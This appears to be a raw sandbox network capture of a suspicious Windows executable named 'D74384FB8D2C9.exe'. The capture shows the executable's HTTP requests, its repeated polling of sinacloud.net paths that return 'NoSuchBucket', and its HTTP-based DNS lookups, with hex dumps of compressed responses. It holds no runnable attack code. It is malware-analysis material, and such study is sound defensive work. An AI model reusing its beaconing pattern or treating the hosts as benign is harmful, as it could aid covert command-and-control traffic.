Date: Thu, 05 Dec 2024 13:25:14 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: BWS/1.1
Set-Cookie: BAIDUID=DF67C95B68FE3902838F5D3A2A969041:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=DF67C95B68FE3902838F5D3A2A969041; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1733405114; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUID=DF67C95B68FE3902E4F6F892049D15C0:FG=1; max-age=31536000; expires=Fri, 05-Dec-25 13:25:14 GMT; domain=.baidu.com; path=/; version=1; comment=bd
Set-Cookie: BDSVRTM=2; path=/
Set-Cookie: BD_HOME=1; path=/
Traceid: 1733405114343403521017135453905001861557
X-Ua-Compatible: IE=Edge,chrome=1
X-Xss-Protection: 1;mode=block
Transfer-Encoding: chunked
Data Raw: 37 31 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 69 73 5c 4b 76 18 f8 9d bf a2 04 44 8b 64 17 6a df 0b cd 27 11 20 48 82 0b 08 12 dc f5 7a 10 b7 6e dd 5b 55 44 6d a8 5b 55 d8 cc 08 c9 9e b6 ec f1 68 0b 85 ed 18 4b e3 19 29 c2 13 33 11 33 2d 39 46 1e 6b 24 4b fa 31 ee f7 ba fb d3 fc 85 39 e7 e4 72 73 bb b5 80 a0 64 47 b8 d1 ef bd aa 5b 79 33 4f 9e 3c 79 f2 ec f9 a3 5f 79 f0 62 f7 f5 87 c3 bd 54 77 3a e8 7f f3 a3 5f c9 64 8e 5e df 7f fd e6 28 f5 e2 69 26 f3 cd 8f d8 d3 6e e0 b5 bf f9 d1 20 98 7a d0 6c 3a ce 04 a7 b3 de fc de c6 ee 68 38 0d 86 d3
Data Ascii: 71dis\KvDdj' Hzn[UDm[UhK)33-9Fk$K19rsdG[y3O<y_ybTw:_d^(i&n zl:h8
Dec 5, 2024 14:25:14.601860046 CET | 1236 | IN | Data Raw: cc eb 8b 71 b0 91 f2 d9 b7 7b 1b d3 e0 7c 9a c3 17 b7 fd ae 37 89 82 e9 bd d9 34 cc d4 37 1c 3d bc cf bc b9 9f d9 1d 0d c6 de b4 d7 ea ab 9d ec ef dd 0b da 9d 60 cb ef 4e 46 83 e0 5e 41 bc 2d 47 f1 fa 67 de 45 b4 91 1a 7a f0 f3 c6 24 08 83 c9 24
Data Ascii: q{|747=`NF^A-GgEz$$f?&|!Oo"O{???//[?gw?~
Dec 5, 2024 14:25:14.601871967 CET | 1236 | IN | Data Raw: 8e 4e bb 6c 86 c0 f0 1c 8b 7d d6 ed 4d 83 0c 90 a2 1f 00 8f 38 9b 78 e3 6d 63 5b 7f 4e 04 29 05 f8 e6 db ab 00 e8 db e6 bb 87 3e 73 ac d6 00 ab 88 59 d8 7c a9 fc 36 f0 0b 38 71 bd 3e 20 a7 d7 19 36 07 c0 36 fa c1 82 fe 71 87 5c 71 e8 09 c1 40 b3
Data Ascii: Nl}M8xmc[N)>sY|68q> 66q\q@Uv#$oAqgn9$pjA.$Tb,ALl73$q*+Lk ZGjOH#+ m%lO%`7 8%OdJa#AQYPf
Dec 5, 2024 14:25:14.601968050 CET | 1236 | IN | Data Raw: 34 87 45 0b b8 d2 1c 52 59 30 47 71 47 06 99 9a b7 16 53 2b e0 1a 66 ce de ea f6 d0 4c 78 41 af 09 23 08 9b 8a 32 91 62 b1 b8 1a 20 64 4a d1 66 bf da 7b 2d 26 92 da f6 af 15 46 56 6d 9b a6 f9 12 79 b7 4b be 14 2b d4 28 34 2a f7 4b db dc 3c 00 a7
Data Ascii: 4ERY0GqGS+fLxA#2b dJf{-&FVmyK+(4*K<2py#$Bea\%-gucM]wuL~rfvJ|+W9'd0&a\>Pzuahy6Hzf )'0!Y5GPRkRNhD.?3VkM:-N
Dec 5, 2024 14:25:14.602047920 CET | 1236 | IN | Data Raw: 42 36 5f df c2 7f dd 4d 84 10 06 3e e6 9e ef 84 a9 d2 c0 ac 8d e6 df e6 e6 7d 5d 39 51 65 50 5c 73 b6 72 35 14 26 ec 93 c0 dc 3a aa f8 a1 b8 1d 61 8e 0e 59 56 d0 63 91 6d 7f 3c e0 93 50 27 e7 c8 65 e7 c5 94 ce a6 6a 8a d9 b7 6f 0b 1d 15 19 58 a2
Data Ascii: B6_M>}]9QeP\sr5&:aYVcm<P'ejoXsKqqM&[w!$q,R,m]F7?g'b.B%`_l|Cjl4ZVkv{jO^oCnna[ne[N:m[-oM[84xiw+v)
Dec 5, 2024 14:25:14.602060080 CET | 1236 | IN | Data Raw: e3 84 55 ce 4d c6 10 07 bb c0 ed d4 18 2d 58 6a 9a 95 c0 25 31 5f f6 88 b5 c3 c9 b1 fc d5 8d 6f 2b ad 7a eb db 72 58 29 6d e0 3b 5d f1 0e 2e 25 5f 02 92 8a 44 12 09 46 c7 de da c4 21 25 68 16 15 e0 03 6e db 20 87 0d 4f 86 a5 30 49 78 40 8b 66 18
Data Ascii: UM-Xj%1_o+zrX)m;].%_DF!%hn O0Ix@f<o:VR'm)?Z]0)QuT1a\]nd`7LRH1@s<a@K8F}kj0ZL@*<:M5EG4|Mva|k|M!3+nXJ
Dec 5, 2024 14:25:14.602102995 CET | 1236 | IN | Data Raw: 8d 7f 3f b7 86 67 f8 57 7b c0 7a 52 da 20 6c 6d 59 13 26 af ea b3 10 3e 2d 05 5a f6 48 f4 c2 1b a8 d3 e1 fd 68 33 12 b2 b0 3a 29 de 4e 9d 17 6f a6 4e 8d b7 d2 67 c7 db a9 13 94 bd a9 73 14 c3 aa d3 24 57 b4 7a 64 52 14 85 58 0b fc 55 47 01 1d 2e
Data Ascii: ?gW{zR lmY&>-ZHh3:)NoNgs$WzdRXUG.pMtxuZXi8&hGb:|#O@Hk5'Zbi6p8PDObffX[YSfLfJ.al:aUn|aMNA9Z%E7X(
Dec 5, 2024 14:25:14.602118015 CET | 1236 | IN | Data Raw: 04 c2 fb 72 bd 98 1f 98 87 f6 b3 3d 04 3f 8b 7d 24 d2 a7 b4 4b 05 ae 47 ef 2c 5f c4 11 0e ee 94 d9 d8 46 68 20 2b 73 a7 bc 6b 95 70 ad ba 24 71 14 92 f5 93 9b 17 73 94 8b c4 ed 26 ba 13 17 88 0e 6c 32 50 42 0d 73 60 20 d6 48 77 4f cb f5 36 79 37
Data Ascii: r=?}$KG,_Fh +skp$qs&l2PBs` HwO6y7|$OjX;Cd5oh~`>Sv_.`[C(\>8EvT=3sbQ.+Tp!m{2ciQ}qL-Ft(?IDTk`3xUze#E=[-
Dec 5, 2024 14:25:14.602406025 CET | 1236 | IN | Data Raw: 47 c0 08 4c 06 dc 14 12 52 f6 75 65 78 e9 ee 5b eb e6 4a 0d 52 1c dc 36 1b eb 07 50 7c 96 0a df 03 18 00 f9 47 c6 ce 69 35 14 98 b1 b8 90 c0 2e 3f 58 ec 08 4c 36 88 3c de f8 d1 4e 1c 14 8d 49 f0 1e 5e 65 56 90 37 cc c1 75 15 ac 2e 86 d7 1f 77 bd
Data Ascii: GLRuex[JR6P|Gi5.?XL6<NI^eV7u.w;<d^1-"7)UDEetK2h]ckbr.cHGZiDtf\VtZ`,E uy@XiGv^nNlCCLgsC}c"[\^Gf#(ylU~VJAA
Dec 5, 2024 14:25:14.602418900 CET | 1236 | IN | Data Raw: 3a 94 e0 ba 0d f8 c3 83 55 1d 1a 9a 6e 99 0f cc 15 67 93 d2 c4 18 a3 8b 38 8e 37 e1 07 d9 a5 ba be a6 3a a3 ac ce c2 c1 8c e0 ee 6a 58 2b d6 f4 48 7e 13 0a fe 86 39 b1 35 de e4 01 df 2c 67 c8 7c 4f 61 97 71 4c b1 1b d9 19 47 54 ed 97 75 4a 24 ad
Data Ascii: :Ung87:jX+H~95,g|OaqLGTuJ$mi'fPkyBsfjI.{M21tVShF3sDsDz8$uE03;q[j^QBV`Xk=x+\Gkx`kerP]79zikYe
Dec 5, 2024 14:25:14.721729040 CET | 1236 | IN | Data Raw: 3b 56 eb ee ac 59 36 15 35 0b 86 e5 0b b0 8d 9f f7 3c b0 41 57 ea 15 bf 10 f8 b5 b6 85 6d f3 f4 f4 11 ea 05 a8 b0 41 55 45 fc 6b 83 7a 09 37 3c 01 a0 7e 2b 2c 7a e0 45 f7 fc af 00 a8 48 eb 22 3a bf 01 22 3e 3d fd 34 cd 34 ea f9 86 0f e6 db 6a f0
Data Ascii: ;VY65<AWmAUEkz7<~+,zEH":">=44j .S6Ui^)gd+Y8Cb6lRvAQH;-HiBFGGT01RSu&}+2t:pb*p&|b'ZCm3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49715 | 119.28.131.242 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:13.770395994 CET | 416 | OUT | GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-CH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: shoufeifz.qijianfz.com
Connection: Keep-Alive
Dec 5, 2024 14:25:15.654213905 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Thu, 05 Dec 2024 06:24:27 GMT
Accept-Ranges: bytes
ETag: "e4101b56de46db1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
Date: Thu, 05 Dec 2024 13:25:15 GMT
Content-Length: 1349
Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 fe c7 bf f7 1f 7c fc bb ce aa 69 7b bd ca d3 79 bb 28 8f 7e e3 e4 31 7e a6 65 b6 bc f8 ec a3 7c f9 11 7f 92 67 33 fa 99 d2 f3 78 91 b7 59 3a 9d 67 75 93 b7 9f 7d f4 d5 9b 67 db 07 68 43 5f e9 77 cb 6c 91 7f f6 d1 65 91 5f ad aa ba fd 48 be 92 67 5a 2d db 7c 49 af 5d 15 b3 76 fe d9 2c bf 2c a6 f9 36 ff 31 4a d7 4d 5e 6f 37 d3 ac cc 26 65 fe d9 b2 1a a5 c5 b2 68 8b ac e4 0f f3 cf 76 c7 3b a3 74 91 bd 2b 16 eb 45 f0 11 35 0b 3e 0a d1 99 b7 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 0b ea e4 23 87 50 91 7f 96 cf 2e 72 fb 6a 5b b4 65 7e f4 b4 9a ae 17 f4 fd e3 bb f2 b7 7e 59 16 cb b7 69 9d 97 9f 7d d4 b4 d7 65 de cc f3 bc fd 28 9d d7 f9 b9 7e 32 9e 36 0d 40 3d be [TRUNCATED]
Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"|i{y(~1~e|g3xY:gu}ghC_wle_HgZ-|I]v,,61JM^o7&ehv;t+E5>j;E~O*k#P.rj[e~~Yi}e(~26@={<fNtZfMG4y_t?(+^f-t{;wGOpb>J?En]4hw<UWVR>GGg_GMgUG?}7wW_7)_G_1w<Ka<6C7gwwG/<K ;@xa_z?O?u^oW|2Z=Kg__ADw_)9'_ywI_gGlg?ppwe{L@?_xpOw/>wM.~1?^Bc|DT
Dec 5, 2024 14:25:15.654232979 CET | 385 | IN | Data Raw: bf e1 f5 83 31 b5 f9 cf fe 9e bf f2 3f ff 53 ff e0 ff ec ef fa e3 ff 8b 3f ed 6f fc 2f fe b8 3f f8 3f ff 9b fe e0 ff e2 8f fb 43 08 89 1b df a5 57 a4 f1 7f fe 0f fc 99 d4 fe bf f8 13 fe aa ff ea 8f ff 93 52 33 f2 fb 9f 7e ba 73 70 ef d3 7b f7 6f
Data Ascii: 1?S?o/??CWR3~sp{op_''Q7DS+w{y6lT*k:RS]MCLXE_A_E\v7-i"Rf__
Dec 5, 2024 14:25:15.667171955 CET | 355 | OUT | GET /style.css HTTP/1.1
Accept: */*
Referer: http://shoufeifz.qijianfz.com/
Accept-Language: en-CH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: shoufeifz.qijianfz.com
Connection: Keep-Alive
Dec 5, 2024 14:25:16.671552896 CET | 918 | IN | HTTP/1.1 200 OK
Content-Type: text/css
Content-Encoding: gzip
Last-Modified: Sat, 13 Oct 2018 11:50:08 GMT
Accept-Ranges: bytes
ETag: "0188be3ea62d41:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
Date: Thu, 05 Dec 2024 13:25:15 GMT
Content-Length: 649
Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 be f5 8b 7f e3 24 a5 67 91 d5 17 c5 f2 d1 ce a1 fc b9 ca 66 b3 62 79 61 ff 2e 8b a6 dd 6e da eb 32 7f 94 2e ab 65 4e 1f ff 92 df 38 c9 f4 e5 36 7f d7 6e cf f2 69 55 67 6d 51 2d 6d 13 fa 2a 9d 56 65 55 3f 4a 7f 7c 67 07 b0 e8 a5 f1 e4 42 5f 9b 64 d3 b7 17 75 b5 5e ce ec f7 f4 69 7a 55 cc da f9 a3 fb bb 3b ab 77 fa c9 3c 2f 2e e6 ed a3 bd 87 ee 23 83 e0 7d fb c9 dd 6f cd 8a 66 55 66 d7 8f d2 f3 32 7f 77 f8 ad bb f2 79 75 99 d7 e7 65 75 f5 28 9d 17 b3 59 be a4 e6 82 c5 9e a2 21 fd ed ee ec fc ee f4 15 fd 6d bb db 71 dd 09 79 b6 db 6a f5 28 dd 93 8f 2d 98 df 7f 57 01 e9 50 eb 7c 46 5f d3 df 0e 32 bf 40 1f 10 66 55 d6 3e 4a cb fc bc a5 4f e4 b3 ef d6 45 4b 43 d9 5e 54 b3 fc 11 21 db [TRUNCATED]
Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"$gfbya.n2.eN86niUgmQ-m*VeU?J|gB_du^izU;w</.#}ofUf2wyueu(Y!mqyj(-WP|F_2@fU>JOEKC^T!.kj@H_(1y6?")X^m:zRobo+Yc9O80^vv???y(Jos?~Z?lXyJ1v5zt^v{#q=>>0o"{"F,Ojg<8Ey`oR?:`$|%R7!80JN!-9/"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49717 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:14.433376074 CET | 236 | OUT | GET /question/data.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:16.212343931 CET | 504 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:25:07 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 35eea2be-2412-0521-2515-6c92bfce6724
x-error-code: NoSuchBucket
Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 65 65 61 32 62 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 35 2d 36 63 39 32 62 66 63 65 36 37 32 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>35eea2be-2412-0521-2515-6c92bfce6724</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                8          | 192.168.2.5 | 49716       | 27.221.16.149   | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:14.433428049 CET | 244               | OUT       | GET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:19.205837965 CET | 512               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:10 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32b98376-2412-0521-2518-b4055d752c87
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 62 39 38 33 37 36 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 38 2d 62 34 30 35 35 64 37 35 32 63 38 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>32b98376-2412-0521-2518-b4055d752c87</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                9          | 192.168.2.5 | 49719       | 27.221.16.179   | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:16.337491035 CET | 236               | OUT       | GET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:18.095194101 CET | 504               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:15 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 35287258-2412-0521-2517-6c92bfce66d4
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 38 37 32 35 38 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 37 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>35287258-2412-0521-2517-6c92bfce66d4</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                10         | 192.168.2.5 | 49721       | 182.254.116.116 | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:18.400424004 CET | 86                | OUT       | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:20.254897118 CET | 131               | IN        | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                11         | 192.168.2.5 | 49722       | 114.114.114.114 | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:18.400489092 CET | 86                | OUT       | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                12         | 192.168.2.5 | 49723       | 119.29.29.29    | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:18.400599957 CET | 83                | OUT       | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:19.638938904 CET | 131               | IN        | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
                                                                                Data Ascii: 27.221.16.149;27.221.16.179


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                13         | 192.168.2.5 | 49725       | 27.221.16.179   | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:19.330724001 CET | 244               | OUT       | GET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:21.160648108 CET | 512               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:18 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 767f865b-2412-0521-2520-b0087553a6a0
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 37 66 38 36 35 62 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 30 2d 62 30 30 38 37 35 35 33 61 36 61 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>767f865b-2412-0521-2520-b0087553a6a0</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                14         | 192.168.2.5 | 49726       | 27.221.16.149   | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:19.767446041 CET | 236               | OUT       | GET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:21.555491924 CET | 504               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:12 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a92b43-2412-0521-2521-b4055d752a1d
                                                                                x-error-code: NoSuchBucket
